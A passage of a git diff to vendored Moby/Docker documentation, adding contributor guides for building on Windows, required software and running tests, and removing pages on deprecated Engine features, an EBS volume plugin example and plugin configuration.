+ +### 1. Windows Server 2016 or Windows 10 with all Windows updates applied + +The major build number must be at least 14393. This can be confirmed, for example, +by running the following from an elevated PowerShell prompt - this sample output +is from a fully up to date machine as at mid-November 2016: + + + PS C:\> $(gin).WindowsBuildLabEx + 14393.447.amd64fre.rs1_release_inmarket.161102-0100 + +### 2. Git for Windows (or another git client) must be installed + +https://git-scm.com/download/win. + +### 3. The machine must be configured to run containers + +For example, by following the quick start guidance at +https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start or https://github.com/docker/labs/blob/master/windows/windows-containers/Setup.md + +### 4. If building in a Hyper-V VM + +For Windows Server 2016 using Windows Server containers as the default option, +it is recommended you have at least 1GB of memory assigned; +For Windows 10 where Hyper-V Containers are employed, you should have at least +4GB of memory assigned. +Note also, to run Hyper-V containers in a VM, it is necessary to configure the VM +for nested virtualization. + +## Usage + +The following steps should be run from an elevated Windows PowerShell prompt. + +>**Note**: In a default installation of containers on Windows following the quick-start guidance at https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start, +the `docker.exe` client must run elevated to be able to connect to the daemon). + +### 1. Windows containers + +To test and run the Windows Moby engine, you need a system that supports Windows Containers: + +- Windows 10 Anniversary Edition +- Windows Server 2016 running in a VM, on bare metal or in the cloud + +Check out the [getting started documentation](https://github.com/docker/labs/blob/master/windows/windows-containers/Setup.md) for details. + +### 2. GitHub account + +To contribute to the Docker project, you need a GitHub account. +A free account is fine. All the Moby project repositories are public and visible to everyone. + +This guide assumes that you have basic familiarity with Git and Github terminology +and usage. +Refer to [GitHub For Beginners: Don’t Get Scared, Get Started](http://readwrite.com/2013/09/30/understanding-github-a-journey-for-beginners-part-1/) +to get up to speed on Github. + +### 3. Git + +In PowerShell, run: + + Invoke-Webrequest "https://github.com/git-for-windows/git/releases/download/v2.7.2.windows.1/Git-2.7.2-64-bit.exe" -OutFile git.exe -UseBasicParsing + Start-Process git.exe -ArgumentList '/VERYSILENT /SUPPRESSMSGBOXES /CLOSEAPPLICATIONS /DIR=c:\git\' -Wait + setx /M PATH "$env:Path;c:\git\cmd" + +You are now ready clone and build the Moby source code. + +### 4. Clone Moby + +In a new (to pick up the path change) PowerShell prompt, run: + + git clone https://github.com/moby/moby + cd moby + +This clones the main Moby repository. Check out [Moby Project](https://mobyproject.org) +to learn about the other software that powers the Moby platform. + +### 5. Build and run + +Create a builder-container with the Moby source code. You can change the source +code on your system and rebuild any time: + + docker build -t nativebuildimage -f .\Dockerfile.windows . + docker build -t nativebuildimage -f Dockerfile.windows -m 2GB . # (if using Hyper-V containers) + +To build Moby, run: + + $DOCKER_GITCOMMIT=(git rev-parse --short HEAD) + docker run --name binaries -e DOCKER_GITCOMMIT=$DOCKER_GITCOMMIT nativebuildimage hack\make.ps1 -Binary + docker run --name binaries -e DOCKER_GITCOMMIT=$DOCKER_GITCOMMIT -m 2GB nativebuildimage hack\make.ps1 -Binary # (if using Hyper-V containers) + +Copy out the resulting Windows Moby Engine binary to `dockerd.exe` in the +current directory: + + docker cp binaries:C:\go\src\github.com\docker\docker\bundles\docker.exe docker.exe + docker cp binaries:C:\go\src\github.com\docker\docker\bundles\dockerd.exe dockerd.exe + +To test it, stop the system Docker daemon and start the one you just built: + + Stop-Service Docker + .\dockerd.exe -D + +The other make targets work too, to run unit tests try: +`docker run --rm docker-builder sh -c 'cd /c/go/src/github.com/docker/docker; hack/make.sh test-unit'`. + +### 6. Remove the interim binaries container + +_(Optional)_ + + docker rm binaries + +### 7. Remove the image + +_(Optional)_ + +It may be useful to keep this image around if you need to build multiple times. +Then you can take advantage of the builder cache to have an image which has all +the components required to build the binaries already installed. + + docker rmi nativebuildimage + +## Validation + +The validation tests can only run directly on the host. +This is because they calculate information from the git repo, but the .git directory +is not passed into the image as it is excluded via `.dockerignore`. +Run the following from a Windows PowerShell prompt (elevation is not required): +(Note Go must be installed to run these tests) + + hack\make.ps1 -DCO -PkgImports -GoFormat + +## Unit tests + +To run unit tests, ensure you have created the nativebuildimage above. +Then run one of the following from an (elevated) Windows PowerShell prompt: + + docker run --rm nativebuildimage hack\make.ps1 -TestUnit + docker run --rm -m 2GB nativebuildimage hack\make.ps1 -TestUnit # (if using Hyper-V containers) + +To run unit tests and binary build, ensure you have created the nativebuildimage above. +Then run one of the following from an (elevated) Windows PowerShell prompt: + + docker run nativebuildimage hack\make.ps1 -All + docker run -m 2GB nativebuildimage hack\make.ps1 -All # (if using Hyper-V containers) + +## Windows limitations + +Don't attempt to use a bind mount to pass a local directory as the bundles +target directory. +It does not work (golang attempts for follow a mapped folder incorrectly). +Instead, use docker cp as per the example. + +`go.zip` is not removed from the image as it is used by the Windows CI servers +to ensure the host and image are running consistent versions of go. + +Nanoserver support is a work in progress. Although the image will build if the +`FROM` statement is updated, it will not work when running autogen through `hack\make.ps1`. +It is suspected that the required GCC utilities (eg gcc, windres, windmc) silently +quit due to the use of console hooks which are not available. + +The docker integration tests do not currently run in a container on Windows, +predominantly due to Windows not supporting privileged mode, so anything using a volume would fail. +They (along with the rest of the docker CI suite) can be run using +https://github.com/jhowardmsft/docker-w2wCIScripts/blob/master/runCI/Invoke-DockerCI.ps1. + +## Where to go next + +In the next section, you'll [learn how to set up and configure Git for +contributing to Moby](set-up-git.md). diff --git a/vendor/github.com/docker/docker/docs/contributing/software-required.md b/vendor/github.com/docker/docker/docs/contributing/software-required.md new file mode 100644 index 0000000000..b14c6f9050 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/software-required.md @@ -0,0 +1,94 @@ +### Get the required software for Linux or macOS + +This page explains how to get the software you need to use a Linux or macOS +machine for Moby development. Before you begin contributing you must have: + +* a GitHub account +* `git` +* `make` +* `docker` + +You'll notice that `go`, the language that Moby is written in, is not listed. +That's because you don't need it installed; Moby's development environment +provides it for you. You'll learn more about the development environment later. + +## Task 1. Get a GitHub account + +To contribute to the Moby project, you will need a GitHub account. A free account is +fine. All the Moby project repositories are public and visible to everyone. + +You should also have some experience using both the GitHub application and `git` +on the command line. + +## Task 2. Install git + +Install `git` on your local system. You can check if `git` is on already on your +system and properly installed with the following command: + +```bash +$ git --version +``` + +This documentation is written using `git` version 2.2.2. Your version may be +different depending on your OS. + +## Task 3. Install make + +Install `make`. You can check if `make` is on your system with the following +command: + +```bash +$ make -v +``` + +This documentation is written using GNU Make 3.81. Your version may be different +depending on your OS. + +## Task 4. Install or upgrade Docker + +If you haven't already, install the Docker software using the +instructions for your operating system. +If you have an existing installation, check your version and make sure you have +the latest Docker. + +To check if `docker` is already installed on Linux: + +```bash +docker --version +Docker version 17.10.0-ce, build f4ffd25 +``` + +On macOS or Windows, you should have installed Docker for Mac or +Docker for Windows. + +```bash +$ docker --version +Docker version 17.10.0-ce, build f4ffd25 +``` + +## Tip for Linux users + +This guide assumes you have added your user to the `docker` group on your system. +To check, list the group's contents: + +``` +$ getent group docker +docker:x:999:ubuntu +``` + +If the command returns no matches, you have two choices. You can preface this +guide's `docker` commands with `sudo` as you work. Alternatively, you can add +your user to the `docker` group as follows: + +```bash +$ sudo usermod -aG docker ubuntu +``` + +You must log out and log back in for this modification to take effect. + + +## Where to go next + +In the next section, you'll [learn how to set up and configure Git for +contributing to Moby](set-up-git.md). diff --git a/vendor/github.com/docker/docker/docs/contributing/test.md b/vendor/github.com/docker/docker/docs/contributing/test.md new file mode 100644 index 0000000000..fdcee328a9 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/test.md @@ -0,0 +1,244 @@ +### Run tests + +Contributing includes testing your changes. If you change the Moby code, you +may need to add a new test or modify an existing test. Your contribution could +even be adding tests to Moby. For this reason, you need to know a little +about Moby's test infrastructure. + +This section describes tests you can run in the `dry-run-test` branch of your Docker +fork. If you have followed along in this guide, you already have this branch. +If you don't have this branch, you can create it or simply use another of your +branches. + +## Understand how to test Moby + +Moby tests use the Go language's test framework. In this framework, files +whose names end in `_test.go` contain test code; you'll find test files like +this throughout the Moby repo. Use these files for inspiration when writing +your own tests. For information on Go's test framework, see Go's testing package +documentation and the go test help. + +You are responsible for _unit testing_ your contribution when you add new or +change existing Moby code. A unit test is a piece of code that invokes a +single, small piece of code (_unit of work_) to verify the unit works as +expected. + +Depending on your contribution, you may need to add _integration tests_. These +are tests that combine two or more work units into one component. These work +units each have unit tests and then, together, integration tests that test the +interface between the components. The `integration` and `integration-cli` +directories in the Docker repository contain integration test code. Note that +`integration-cli` tests are now deprecated in the Moby project, and new tests +cannot be added to this suite - add `integration` tests instead using the API +client. + +Testing is its own specialty. If you aren't familiar with testing techniques, +there is a lot of information available to you on the Web. For now, you should +understand that, the Docker maintainers may ask you to write a new test or +change an existing one. + +## Run tests on your local host + +Before submitting a pull request with a code change, you should run the entire +Moby Engine test suite. The `Makefile` contains a target for the entire test +suite, named `test`. Also, it contains several targets for +testing: + +| Target | What this target does | +| ---------------------- | ---------------------------------------------- | +| `test` | Run the unit, integration, and docker-py tests | +| `test-unit` | Run just the unit tests | +| `test-integration` | Run the integration tests | +| `test-docker-py` | Run the tests for the Docker API client | + +Running the entire test suite on your current repository can take over half an +hour. To run the test suite, do the following: + +1. Open a terminal on your local host. + +2. Change to the root of your Docker repository. + + ```bash + $ cd moby-fork + ``` + +3. Make sure you are in your development branch. + + ```bash + $ git checkout dry-run-test + ``` + +4. Run the `make test` command. + + ```bash + $ make test + ``` + + This command does several things, it creates a container temporarily for + testing. Inside that container, the `make`: + + * creates a new binary + * cross-compiles all the binaries for the various operating systems + * runs all the tests in the system + + It can take approximate one hour to run all the tests. The time depends + on your host performance. The default timeout is 60 minutes, which is + defined in `hack/make.sh` (`${TIMEOUT:=60m}`). You can modify the timeout + value on the basis of your host performance. When they complete + successfully, you see the output concludes with something like this: + + ```none + Ran 68 tests in 79.135s + ``` + +## Run targets inside a development container + +If you are working inside a development container, you use the +`hack/test/unit` script to run unit-tests, and `hack/make.sh` script to run +integration and other tests. The `hack/make.sh` script doesn't +have a single target that runs all the tests. Instead, you provide a single +command line with multiple targets that does the same thing. + +Try this now. + +1. Open a terminal and change to the `moby-fork` root. + +2. Start a Moby development image. + + If you are following along with this guide, you should have a + `dry-run-test` image. + + ```bash + $ docker run --privileged --rm -ti -v `pwd`:/go/src/github.com/docker/docker dry-run-test /bin/bash + ``` + +3. Run the unit tests using the `hack/test/unit` script. + + ```bash + # hack/test/unit + ``` + +4. Run the tests using the `hack/make.sh` script. + + ```bash + # hack/make.sh dynbinary binary cross test-integration test-docker-py + ``` + + The tests run just as they did within your local host. + + Of course, you can also run a subset of these targets too. For example, to run + just the integration tests: + + ```bash + # hack/make.sh dynbinary binary cross test-integration + ``` + + Most test targets require that you build these precursor targets first: + `dynbinary binary cross` + + +## Run unit tests + +We use golang standard [testing](https://golang.org/pkg/testing/) +package or [gocheck](https://labix.org/gocheck) for our unit tests. + +You can use the `TESTDIRS` environment variable to run unit tests for +a single package. + +```bash +$ TESTDIRS='opts' make test-unit +``` + +You can also use the `TESTFLAGS` environment variable to run a single test. The +flag's value is passed as arguments to the `go test` command. For example, from +your local host you can run the `TestBuild` test with this command: + +```bash +$ TESTFLAGS='-test.run ^TestValidateIPAddress$' make test-unit +``` + +On unit tests, it's better to use `TESTFLAGS` in combination with +`TESTDIRS` to make it quicker to run a specific test. + +```bash +$ TESTDIRS='opts' TESTFLAGS='-test.run ^TestValidateIPAddress$' make test-unit +``` + +## Run integration tests + +We use [gocheck](https://labix.org/gocheck) for our integration-cli tests. +You can use the `TESTFLAGS` environment variable to run a single test. The +flag's value is passed as arguments to the `go test` command. For example, from +your local host you can run the `TestBuild` test with this command: + +```bash +$ TESTFLAGS='-check.f DockerSuite.TestBuild*' make test-integration +``` + +To run the same test inside your Docker development container, you do this: + +```bash +# TESTFLAGS='-check.f TestBuild*' hack/make.sh binary test-integration +``` + +## Test the Windows binary against a Linux daemon + +This explains how to test the Windows binary on a Windows machine set up as a +development environment. The tests will be run against a daemon +running on a remote Linux machine. You'll use **Git Bash** that came with the +Git for Windows installation. **Git Bash**, just as it sounds, allows you to +run a Bash terminal on Windows. + +1. If you don't have one open already, start a Git Bash terminal. + + ![Git Bash](images/git_bash.png) + +2. Change to the `moby` source directory. + + ```bash + $ cd /c/gopath/src/github.com/docker/docker + ``` + +3. Set `DOCKER_REMOTE_DAEMON` as follows: + + ```bash + $ export DOCKER_REMOTE_DAEMON=1 + ``` + +4. Set `DOCKER_TEST_HOST` to the `tcp://IP_ADDRESS:2376` value; substitute your + Linux machines actual IP address. For example: + + ```bash + $ export DOCKER_TEST_HOST=tcp://213.124.23.200:2376 + ``` + +5. Make the binary and run the tests: + + ```bash + $ hack/make.sh binary test-integration + ``` + Some tests are skipped on Windows for various reasons. You can see which + tests were skipped by re-running the make and passing in the + `TESTFLAGS='-test.v'` value. For example + + ```bash + $ TESTFLAGS='-test.v' hack/make.sh binary test-integration + ``` + + Should you wish to run a single test such as one with the name + 'TestExample', you can pass in `TESTFLAGS='-check.f TestExample'`. For + example + + ```bash + $ TESTFLAGS='-check.f TestExample' hack/make.sh binary test-integration + ``` + +You can now choose to make changes to the Moby source or the tests. If you +make any changes, just run these commands again. + +## Where to go next + +Congratulations, you have successfully completed the basics you need to +understand the Moby test framework. diff --git a/vendor/github.com/docker/docker/docs/contributing/who-written-for.md b/vendor/github.com/docker/docker/docs/contributing/who-written-for.md new file mode 100644 index 0000000000..1431f42c50 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/who-written-for.md @@ -0,0 +1,49 @@ +### README first + +This section of the documentation contains a guide for Moby project users who want to +contribute code or documentation to the Moby Engine project. As a community, we +share rules of behavior and interaction. Make sure you are familiar with the community guidelines before continuing. + +## Where and what you can contribute + +The Moby project consists of not just one but several repositories on GitHub. +So, in addition to the `moby/moby` repository, there is the +`containerd/containerd` repo, the `moby/buildkit` repo, and several more. +Contribute to any of these and you contribute to the Moby project. + +Not all Moby repositories use the Go language. Also, each repository has its +own focus area. So, if you are an experienced contributor, think about +contributing to a Moby project repository that has a language or a focus area you are +familiar with. + +If you are new to the open source community, to Moby, or to formal +programming, you should start out contributing to the `moby/moby` +repository. Why? Because this guide is written for that repository specifically. + +Finally, code or documentation isn't the only way to contribute. You can report +an issue, add to discussions in our community channel, write a blog post, or +take a usability test. You can even propose your own type of contribution. +Right now we don't have a lot written about this yet, but feel free to open an issue +to discuss other contributions. + +## How to use this guide + +This is written for the distracted, the overworked, the sloppy reader with fair +`git` skills and a failing memory for the GitHub GUI. The guide attempts to +explain how to use the Moby Engine development environment as precisely, +predictably, and procedurally as possible. + +Users who are new to Engine development should start by setting up their +environment. Then, they should try a simple code change. After that, you should +find something to work on or propose a totally new change. + +If you are a programming prodigy, you still may find this documentation useful. +Please feel free to skim past information you find obvious or boring. + +## How to get started + +Start by getting the software you require. If you are on Mac or Linux, go to +[get the required software for Linux or macOS](software-required.md). If you are +on Windows, see [get the required software for Windows](software-req-win.md). diff --git a/vendor/github.com/docker/docker/docs/deprecated.md b/vendor/github.com/docker/docker/docs/deprecated.md deleted file mode 100644 index 1298370ba9..0000000000 --- a/vendor/github.com/docker/docker/docs/deprecated.md +++ /dev/null @@ -1,286 +0,0 @@ ---- -aliases: ["/engine/misc/deprecated/"] -title: "Deprecated Engine Features" -description: "Deprecated Features." -keywords: "docker, documentation, about, technology, deprecate" ---- - - - -# Deprecated Engine Features - -The following list of features are deprecated in Engine. -To learn more about Docker Engine's deprecation policy, -see [Feature Deprecation Policy](https://docs.docker.com/engine/#feature-deprecation-policy). - - -### Top-level network properties in NetworkSettings - -**Deprecated In Release: v1.13.0** - -**Target For Removal In Release: v1.16** - -When inspecting a container, `NetworkSettings` contains top-level information -about the default ("bridge") network; - -`EndpointID`, `Gateway`, `GlobalIPv6Address`, `GlobalIPv6PrefixLen`, `IPAddress`, -`IPPrefixLen`, `IPv6Gateway`, and `MacAddress`. - -These properties are deprecated in favor of per-network properties in -`NetworkSettings.Networks`. These properties were already "deprecated" in -docker 1.9, but kept around for backward compatibility. - -Refer to [#17538](https://github.com/docker/docker/pull/17538) for further -information. - -## `filter` param for `/images/json` endpoint -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -The `filter` param to filter the list of image by reference (name or name:tag) is now implemented as a regular filter, named `reference`. - -### `repository:shortid` image references -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -`repository:shortid` syntax for referencing images is very little used, collides with tag references can be confused with digest references. - -### `docker daemon` subcommand -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -The daemon is moved to a separate binary (`dockerd`), and should be used instead. - -### Duplicate keys with conflicting values in engine labels -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -Duplicate keys with conflicting values have been deprecated. A warning is displayed -in the output, and an error will be returned in the future. - -### `MAINTAINER` in Dockerfile -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -`MAINTAINER` was an early very limited form of `LABEL` which should be used instead. - -### API calls without a version -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -API versions should be supplied to all API calls to ensure compatibility with -future Engine versions. Instead of just requesting, for example, the URL -`/containers/json`, you must now request `/v1.25/containers/json`. - -### Backing filesystem without `d_type` support for overlay/overlay2 -**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -**Target For Removal In Release: v1.16** - -The overlay and overlay2 storage driver does not work as expected if the backing -filesystem does not support `d_type`. For example, XFS does not support `d_type` -if it is formatted with the `ftype=0` option. - -Please also refer to [#27358](https://github.com/docker/docker/issues/27358) for -further information. - -### Three arguments form in `docker import` -**Deprecated In Release: [v0.6.7](https://github.com/docker/docker/releases/tag/v0.6.7)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -The `docker import` command format `file|URL|- [REPOSITORY [TAG]]` is deprecated since November 2013. It's no more supported. - -### `-h` shorthand for `--help` - -**Deprecated In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -**Target For Removal In Release: v1.15** - -The shorthand (`-h`) is less common than `--help` on Linux and cannot be used -on all subcommands (due to it conflicting with, e.g. `-h` / `--hostname` on -`docker create`). For this reason, the `-h` shorthand was not printed in the -"usage" output of subcommands, nor documented, and is now marked "deprecated". - -### `-e` and `--email` flags on `docker login` -**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)** - -**Target For Removal In Release: v1.14** - -The docker login command is removing the ability to automatically register for an account with the target registry if the given username doesn't exist. Due to this change, the email flag is no longer required, and will be deprecated. - -### Separator (`:`) of `--security-opt` flag on `docker run` -**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)** - -**Target For Removal In Release: v1.14** - -The flag `--security-opt` doesn't use the colon separator(`:`) anymore to divide keys and values, it uses the equal symbol(`=`) for consistency with other similar flags, like `--storage-opt`. - -### `/containers/(id or name)/copy` endpoint - -**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -The endpoint `/containers/(id or name)/copy` is deprecated in favor of `/containers/(id or name)/archive`. - -### Ambiguous event fields in API -**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -The fields `ID`, `Status` and `From` in the events API have been deprecated in favor of a more rich structure. -See the events API documentation for the new format. - -### `-f` flag on `docker tag` -**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -To make tagging consistent across the various `docker` commands, the `-f` flag on the `docker tag` command is deprecated. It is not longer necessary to specify `-f` to move a tag from one image to another. Nor will `docker` generate an error if the `-f` flag is missing and the specified tag is already in use. - -### HostConfig at API container start -**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -Passing an `HostConfig` to `POST /containers/{name}/start` is deprecated in favor of -defining it at container creation (`POST /containers/create`). - -### `--before` and `--since` flags on `docker ps` - -**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -The `docker ps --before` and `docker ps --since` options are deprecated. -Use `docker ps --filter=before=...` and `docker ps --filter=since=...` instead. - -### `--automated` and `--stars` flags on `docker search` - -**Deprecated in Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -**Target For Removal In Release: v1.15** - -The `docker search --automated` and `docker search --stars` options are deprecated. -Use `docker search --filter=is-automated=...` and `docker search --filter=stars=...` instead. - -### Driver Specific Log Tags -**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -Log tags are now generated in a standard way across different logging drivers. -Because of which, the driver specific log tag options `syslog-tag`, `gelf-tag` and -`fluentd-tag` have been deprecated in favor of the generic `tag` option. - - docker --log-driver=syslog --log-opt tag="{{.ImageName}}/{{.Name}}/{{.ID}}" - -### LXC built-in exec driver -**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** - -**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -The built-in LXC execution driver, the lxc-conf flag, and API fields have been removed. - -### Old Command Line Options -**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** - -**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** - -The flags `-d` and `--daemon` are deprecated in favor of the `daemon` subcommand: - - docker daemon -H ... - -The following single-dash (`-opt`) variant of certain command line options -are deprecated and replaced with double-dash options (`--opt`): - - docker attach -nostdin - docker attach -sig-proxy - docker build -no-cache - docker build -rm - docker commit -author - docker commit -run - docker events -since - docker history -notrunc - docker images -notrunc - docker inspect -format - docker ps -beforeId - docker ps -notrunc - docker ps -sinceId - docker rm -link - docker run -cidfile - docker run -dns - docker run -entrypoint - docker run -expose - docker run -link - docker run -lxc-conf - docker run -n - docker run -privileged - docker run -volumes-from - docker search -notrunc - docker search -stars - docker search -t - docker search -trusted - docker tag -force - -The following double-dash options are deprecated and have no replacement: - - docker run --cpuset - docker run --networking - docker ps --since-id - docker ps --before-id - docker search --trusted - -**Deprecated In Release: [v1.5.0](https://github.com/docker/docker/releases/tag/v1.5.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -The single-dash (`-help`) was removed, in favor of the double-dash `--help` - - docker -help - docker [COMMAND] -help - -### `--run` flag on docker commit - -**Deprecated In Release: [v0.10.0](https://github.com/docker/docker/releases/tag/v0.10.0)** - -**Removed In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** - -The flag `--run` of the docker commit (and its short version `-run`) were deprecated in favor -of the `--changes` flag that allows to pass `Dockerfile` commands. - - -### Interacting with V1 registries - -**Disabled By Default In Release: v1.14** - -**Target For Removal In Release: v1.17** - -Version 1.9 adds a flag (`--disable-legacy-registry=false`) which prevents the -docker daemon from `pull`, `push`, and `login` operations against v1 -registries. Though enabled by default, this signals the intent to deprecate -the v1 protocol. - -Support for the v1 protocol to the public registry was removed in 1.13. Any -mirror configurations using v1 should be updated to use a -[v2 registry mirror](https://docs.docker.com/registry/recipes/mirror/). - -### Docker Content Trust ENV passphrase variables name change -**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)** - -**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** - -Since 1.9, Docker Content Trust Offline key has been renamed to Root key and the Tagging key has been renamed to Repository key. Due to this renaming, we're also changing the corresponding environment variables - -- DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE is now named DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE -- DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE is now named DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE diff --git a/vendor/github.com/docker/docker/docs/extend/EBS_volume.md b/vendor/github.com/docker/docker/docs/extend/EBS_volume.md deleted file mode 100644 index 8c64efa164..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/EBS_volume.md +++ /dev/null @@ -1,164 +0,0 @@ ---- -description: Volume plugin for Amazon EBS -keywords: "API, Usage, plugins, documentation, developer, amazon, ebs, rexray, volume" -title: Volume plugin for Amazon EBS ---- - - - -# A proof-of-concept Rexray plugin - -In this example, a simple Rexray plugin will be created for the purposes of using -it on an Amazon EC2 instance with EBS. It is not meant to be a complete Rexray plugin. - -The example source is available at [https://github.com/tiborvass/rexray-plugin](https://github.com/tiborvass/rexray-plugin). - -To learn more about Rexray: [https://github.com/codedellemc/rexray](https://github.com/codedellemc/rexray) - -## 1. Make a Docker image - -The following is the Dockerfile used to containerize rexray. - -```Dockerfile -FROM debian:jessie -RUN apt-get update && apt-get install -y --no-install-recommends wget ca-certificates -RUN wget https://dl.bintray.com/emccode/rexray/stable/0.6.4/rexray-Linux-x86_64-0.6.4.tar.gz -O rexray.tar.gz && tar -xvzf rexray.tar.gz -C /usr/bin && rm rexray.tar.gz -RUN mkdir -p /run/docker/plugins /var/lib/libstorage/volumes -ENTRYPOINT ["rexray"] -CMD ["--help"] -``` - -To build it you can run `image=$(cat Dockerfile | docker build -q -)` and `$image` -will reference the containerized rexray image. - -## 2. Extract rootfs - -```sh -$ TMPDIR=/tmp/rexray # for the purpose of this example -$ # create container without running it, to extract the rootfs from image -$ docker create --name rexray "$image" -$ # save the rootfs to a tar archive -$ docker export -o $TMPDIR/rexray.tar rexray -$ # extract rootfs from tar archive to a rootfs folder -$ ( mkdir -p $TMPDIR/rootfs; cd $TMPDIR/rootfs; tar xf ../rexray.tar ) -``` - -## 3. Add plugin configuration - -We have to put the following JSON to `$TMPDIR/config.json`: - -```json -{ - "Args": { - "Description": "", - "Name": "", - "Settable": null, - "Value": null - }, - "Description": "A proof-of-concept EBS plugin (using rexray) for Docker", - "Documentation": "https://github.com/tiborvass/rexray-plugin", - "Entrypoint": [ - "/usr/bin/rexray", "service", "start", "-f" - ], - "Env": [ - { - "Description": "", - "Name": "REXRAY_SERVICE", - "Settable": [ - "value" - ], - "Value": "ebs" - }, - { - "Description": "", - "Name": "EBS_ACCESSKEY", - "Settable": [ - "value" - ], - "Value": "" - }, - { - "Description": "", - "Name": "EBS_SECRETKEY", - "Settable": [ - "value" - ], - "Value": "" - } - ], - "Interface": { - "Socket": "rexray.sock", - "Types": [ - "docker.volumedriver/1.0" - ] - }, - "Linux": { - "AllowAllDevices": true, - "Capabilities": ["CAP_SYS_ADMIN"], - "Devices": null - }, - "Mounts": [ - { - "Source": "/dev", - "Destination": "/dev", - "Type": "bind", - "Options": ["rbind"] - } - ], - "Network": { - "Type": "host" - }, - "PropagatedMount": "/var/lib/libstorage/volumes", - "User": {}, - "WorkDir": "" -} -``` - -Please note a couple of points: -- `PropagatedMount` is needed so that the docker daemon can see mounts done by the -rexray plugin from within the container, otherwise the docker daemon is not able -to mount a docker volume. -- The rexray plugin needs dynamic access to host devices. For that reason, we -have to give it access to all devices under `/dev` and set `AllowAllDevices` to -true for proper access. -- The user of this simple plugin can change only 3 settings: `REXRAY_SERVICE`, -`EBS_ACCESSKEY` and `EBS_SECRETKEY`. This is because of the reduced scope of this -plugin. Ideally other rexray parameters could also be set. - -## 4. Create plugin - -`docker plugin create tiborvass/rexray-plugin "$TMPDIR"` will create the plugin. - -```sh -$ docker plugin ls -ID NAME DESCRIPTION ENABLED -2475a4bd0ca5 tiborvass/rexray-plugin:latest A rexray volume plugin for Docker false -``` - -## 5. Test plugin - -```sh -$ docker plugin set tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY` -$ docker plugin enable tiborvass/rexray-plugin -$ docker volume create -d tiborvass/rexray-plugin my-ebs-volume -$ docker volume ls -DRIVER VOLUME NAME -tiborvass/rexray-plugin:latest my-ebs-volume -$ docker run --rm -v my-ebs-volume:/volume busybox sh -c 'echo bye > /volume/hi' -$ docker run --rm -v my-ebs-volume:/volume busybox cat /volume/hi -bye -``` - -## 6. Push plugin - -First, ensure you are logged in with `docker login`. Then you can run: -`docker plugin push tiborvass/rexray-plugin` to push it like a regular docker -image to a registry, to make it available for others to install via -`docker plugin install tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY`. diff --git a/vendor/github.com/docker/docker/docs/extend/config.md b/vendor/github.com/docker/docker/docs/extend/config.md deleted file mode 100644 index 096d2d0822..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/config.md +++ /dev/null @@ -1,225 +0,0 @@ ---- -title: "Plugin config" -description: "How develop and use a plugin with the managed plugin system" -keywords: "API, Usage, plugins, documentation, developer" ---- - - - - -# Plugin Config Version 1 of Plugin V2 - -This document outlines the format of the V0 plugin configuration. The plugin -config described herein was introduced in the Docker daemon in the [v1.12.0 -release](https://github.com/docker/docker/commit/f37117045c5398fd3dca8016ea8ca0cb47e7312b). - -Plugin configs describe the various constituents of a docker plugin. Plugin -configs can be serialized to JSON format with the following media types: - -Config Type | Media Type -------------- | ------------- -config | 